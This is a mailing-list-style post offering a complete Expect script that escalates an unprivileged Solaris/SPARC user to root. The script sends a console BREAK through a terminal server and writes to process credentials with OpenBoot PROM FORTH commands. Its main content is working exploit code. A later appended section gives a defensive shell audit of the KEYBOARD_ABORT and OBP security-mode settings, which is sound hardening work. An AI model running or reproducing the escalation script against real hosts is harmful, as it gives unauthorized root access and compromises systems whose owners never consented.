This script is used to automate escalation of normal user privileges to root making use of FORTH hacking on Sparc hardware.
325fd7bf0f7765175435cfc0edb188bbfee72d6c1fa31b5dedf1ab31c371b473
Hi there,
here is a fully automated script for getting a root shell using a normal user account
and (remote-)console access. The script was written by me based on an article
from phrack.com (article #53 - hacking forth by mudge)
---snip---
#
# ---> consroot.exp <---
# by mickeyX 16.6.2003
#
# connects to a SUN and a Terminalserver and hacks the OBP to get a root shell.
# You need:
# - a "normal" user account on a SUN
# - terminalserveraccess on the same SUN
#
# this was tested on:
# - MacOS X version 10.2.6 using expect 5.38.0
# - Solaris 8 using expect 5.25.0
# - ANNEX terminalservers
# - CYCLADES terminalservers
#
# This is just a prototype ! Use with care on other terminalservers !
#
#
set timeout 2
set MODE [lindex $argv 0]
set TARGET [lindex $argv 1]
set UID [lindex $argv 2]
set PW [lindex $argv 3]
set CTYPE [lindex $argv 4]
set TSERVER [lindex $argv 5]
set TPORT [lindex $argv 6]
set TPW [lindex $argv 7]
set LOG log.txt
proc usage {} {
puts "\nusage: expect consroot <MODE> <TARGET> <USER> <PW> <CONSOLETYPE> <TERMINALSERVER> <PORT> <TPW>"
puts "\twhere MODE is one of:"
puts "\t\tT = Target is using TELNET"
puts "\t\tS = Target is using SSH"
puts "\tTARGET = machine to hack"
puts "\tUSER = unprivileged user on target host"
puts "\tPW = password on target host"
puts "\n\twhere CONSOLETYPE is one of:"
puts "\t\tA = Target is connected to Annex Terminalserver"
puts "\t\tC = Target is connected to Cyclades Terminalserver\n"
puts "\tTERMINALSERVER = consoleaccess for target host"
puts "\tPORT = TCP/IP-port (!) on terminalserver where target is connected"
puts "\tTPW = password for terminalserverport\n"
exit 1
}
###
# MAIN
###
if { $argc < 8 } usage
# check for Terminalservertypes...
switch -- $CTYPE \
A {
} C {
} default usage
# check for connect-Mode...
switch -- $MODE \
T { spawn telnet $TARGET
set main_session $spawn_id
expect "ogin:"
send "$UID\n"
expect "assword"
send "$PW\n"
} S { spawn ssh -l $UID $TARGET
set main_session $spawn_id
expect "assword"
send "$PW\n"
} default usage
# start korn-shell...
expect { exp_continue }
send "exec /usr/bin/ksh\n"
# set defined prompt - so we can scan for it...
send "export PS1=PROMPT:\n"
# activate logging for getting credentials Adress...
log_file -noappend $LOG
###
# get adress for OBP-hacking:
###
send "/usr/bin/ps -o addr -p $$\n"
expect "ADDR"
expect "PROMPT:"
set ADRESS [exec sh "-c" "cat $LOG | grep -v PROMPT: | tail -1"]
puts "\nReceived ADRESS from shell was: $ADRESS\n"
###
###
###
# reset logfile...
exec sh "-c" "1>$LOG"
###
# get OS-architecture for OBP-hacking:
###
send "/usr/bin/isainfo -b\n"
# clear expect buffer
expect "*"
expect "PROMPT:"
set ARC [exec sh "-c" "cat $LOG | tail -2 | head -1"]
puts "\nReceived Architecture was: $ARC\n"
exec "rm" "-f" "$LOG"
###
###
###
# connect to Terminalserver...
puts "\nPlease wait while connecting to Terminalserver...\n"
spawn telnet -e "#" $TSERVER $TPORT
switch -- $CTYPE \
A { puts "\nstarting Annex connect ...\n"
expect "Port password"
send "$TPW\n"
expect "Permission granted"
} C { puts "\nstarting Cyclades connect ...\n"
expect "Port*:"
send "$TPW\n"
expect "Password:"
send "$TPW\n"
expect "*"
}
# hack OBP...
send "#\n"
expect "telnet"
send "send brk\n"
expect "ok"
# let's ROCK and ROLL !!!
switch -- $ARC \
64 { send "hex 0 $ADRESS 20 + x@ 4 + l!\n"
} 32 { send "hex 0 $ADRESS 14 + l@ 4 + l!\n"
}
expect "ok"
send "go\r"
# deactivate logging...
log_file
exec rm "-f" "$LOG"
# give control to admin...
set spawn_id $main_session
send "\r"
expect "PROMPT:"
send "id\n"
expect "PROMPT:"
interact
---snip---
--
UNIX is like a wigwam: no windows, no gates, apache inside, stable.
Windows is not the answer - it's the question. No is the answer.
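As an added example that is not part of the original post or of the author's script, the following POSIX sh audit checks the two Solaris/SPARC settings that close the console-break path the script above depends on: KEYBOARD_ABORT in /etc/default/kbd (whether a BREAK on the serial console drops the host to the ok prompt at all) and the OBP security-mode reported by eeprom(1M) (whether PROM commands such as memory writes need a password once the ok prompt is reached). Both functions read from file paths passed as parameters, and the sample files in the demo are constructed, so it runs offline; on a real host you would point it at /etc/default/kbd and at the saved output of `eeprom security-mode`.

```shell
#!/bin/sh
# Added example, not the project's code: audit Solaris/SPARC console-break hardening.
# Inputs are file paths so the checks can be run against saved output offline.

# Print the effective KEYBOARD_ABORT value from an /etc/default/kbd-style file.
# A missing or commented-out line means the Solaris default, "enable".
kbd_abort_setting() {
    kbd_file="$1"
    kbd_val=$(sed -n 's/^[[:space:]]*KEYBOARD_ABORT=[[:space:]]*\([A-Za-z]*\).*/\1/p' "$kbd_file" | tail -1)
    if [ -z "$kbd_val" ]; then
        kbd_val=enable
    fi
    printf '%s\n' "$kbd_val" | tr 'A-Z' 'a-z'
}

# Print the OBP security-mode from saved `eeprom security-mode` output
# (one line of the form "security-mode=none"). A missing line is treated as "none".
obp_security_mode() {
    eep_file="$1"
    eep_val=$(sed -n 's/^security-mode=\(.*\)$/\1/p' "$eep_file" | tail -1)
    if [ -z "$eep_val" ]; then
        eep_val=none
    fi
    printf '%s\n' "$eep_val"
}

# Return 0 (hardened) only if the console ignores BREAK AND the PROM requires a
# password for commands; print one FINDING line per weak setting otherwise.
console_hardened() {
    abort=$(kbd_abort_setting "$1")
    mode=$(obp_security_mode "$2")
    status=0
    case "$abort" in
        disable) ;;   # BREAK / Stop-A is ignored, no drop to the ok prompt
        *) echo "FINDING: KEYBOARD_ABORT=$abort (console break drops the host to OBP)"
           status=1 ;;
    esac
    case "$mode" in
        command|full) ;;   # OBP asks for its password before running commands
        *) echo "FINDING: security-mode=$mode (OBP commands need no password)"
           status=1 ;;
    esac
    return $status
}

# Demo on constructed sample files (not taken from a real host).
demo_dir=$(mktemp -d)
printf 'KEYBOARD_ABORT=enable\n'            > "$demo_dir/kbd.weak"
printf '# hardened host\nKEYBOARD_ABORT=disable\n' > "$demo_dir/kbd.hard"
printf 'security-mode=none\n'              > "$demo_dir/eeprom.weak"
printf 'security-mode=command\n'           > "$demo_dir/eeprom.hard"
if console_hardened "$demo_dir/kbd.weak" "$demo_dir/eeprom.weak"; then
    echo "weak sample: hardened"
else
    echo "weak sample: NOT hardened"
fi
if console_hardened "$demo_dir/kbd.hard" "$demo_dir/eeprom.hard"; then
    echo "hard sample: hardened"
else
    echo "hard sample: NOT hardened"
fi
rm -rf "$demo_dir"
```

Both findings are independent: KEYBOARD_ABORT=disable stops the break from ever producing an ok prompt, while security-mode=command or full is the backstop if someone reaches the PROM anyway (for example through a different abort sequence or a physical keyboard). A terminal server that is itself reachable from the network with a weak port password is the third piece of the chain above and is outside what a host-side audit can see.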